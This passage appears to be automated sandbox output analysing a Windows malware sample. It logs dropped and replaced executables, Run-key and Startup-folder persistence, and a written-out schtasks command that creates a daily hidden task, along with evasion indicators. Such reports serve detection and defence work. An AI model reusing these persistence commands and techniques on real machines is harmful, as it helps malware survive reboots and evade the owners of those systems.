Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\AppVClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zG.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\firefox.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\FXSSVC.exe Jump to dropped file
Source: C:\Users\Public\Libraries\aymtmquJ.pif File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\alg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zFM.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe Jump to dropped file
Source: C:\Users\Public\Libraries\aymtmquJ.pif File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Juqmtmya.PIF Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe File created: C:\Users\Public\Libraries\aymtmquJ.pif Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\AppVClient.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\FXSSVC.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\alg.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006ECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 13_2_006ECBD0
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Juqmtmya Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Juqmtmya Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02D0AB1C
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\Public\Libraries\aymtmquJ.pif Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
